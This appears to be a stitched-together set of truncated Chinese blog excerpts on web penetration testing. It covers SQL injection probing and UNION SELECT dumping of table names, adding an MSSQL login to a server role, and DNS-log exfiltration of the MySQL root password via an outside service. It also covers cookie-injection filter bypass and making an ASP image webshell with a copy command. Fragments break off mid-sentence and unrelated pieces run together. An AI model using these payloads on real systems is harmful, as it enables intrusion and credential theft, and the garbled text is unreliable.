一、三种判断注入点方法：1. id=1' 报错2. id=1 and 1=1正常   and 1=2 报错 二、判断数据库类型Oracle  mysql  sql  server  access  MSsql  mongodb三、知识拓展（1）--+为注释 （2）limit是mysql的语法

win10连接远程桌面的具体步骤如下：1、使用组合快捷键win键+r键打开运行窗口，输入“mstsc”回车确认打开远程桌面连接2，连接首先我们要在外网服务器上部署我们的mssql数据库接下来就是对我们的mssql数据库进行配置exec master.dbo.sp_addlogin Tricker,123;--exec master.dbo.sp_addsrvrolemember Tricker,s

关于Oracle注入，一般推荐使用火狐浏览器。如果？id=1'  回显错误提示，如：Warning: oci_parse(): ORA-01756: quoted string not properly terminated in /home/website/default/index.php on line 13这样有ORA-编号开头的函数错误，可判断一般为oracle数据库，

首先注册cecy.io，并对其进行配置记住自己的然后文本编辑器，将payload中的mysql对应语句复制进去，用自己的identifier替换下面划线部分将其中的SELECT password FROM mysql.user WHERE user='root' LIMIT 1替换为select database

依然是使用and 1=1 没有拦截order by 可得字段数为2and 1=2 UNION SELECT 1,version()查询版本可得版本为5.5.53根据版本选择注入语句and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()查询表名表名为admin查询密码

进入靶场点击进入产品展示区，随便点进去一个产品，照例1=1，order by测试一下，发现居然有26个字段，且无法使用union select，有关键字过滤，经测试可以使用上一篇Cookie注入中的谷歌插件，此次使用另外一种方法，使用javascript语句进行绕过。例如如图1 图1这里如果要查询字段长度，可用javascript:alert(document.cookie="

首先进入靶场，尝试and 1=1 判断注入点是否存在，然而  出现了如下情况：由反馈可知，网站有过滤字段功能，此时我们可以使用谷歌的modheader插件进行绕过输入cookie头和id，把原链接的?id=171删掉然后回车进入          发现依然会进入之前的新闻页面，此时在cookie头后面添加注入字段【注意

《新手操作轻喷》图片马制作试了一些发现还是cmd方法好用，而且不会图片加载不了简单来说方法就是把一个图片（如1.jpg）和一个asp一句话马文件（如2.asp）放在桌面上打开cmd  输入cd desktop 回车连接到桌面然后输入代码：copy 1.jpg/a+2.asp/b  其中1.jpg和2.asp对应桌面上的两个文件，加号不能省略，且不一定是asp

<?php  $code = fopen("code.text","r") or die ("unable to open");#打开文件  fread($code,filesize("code.text"));#读取整个文件 若为fread($code,"10&

<?phpheader("Content-type: text/html; charset=utf-8");$username = trim($_GET["user"]); #trim函数移除字符串两侧的空白字符或其他预定义字符$password = trim($_GET["password"]);$err = '/and|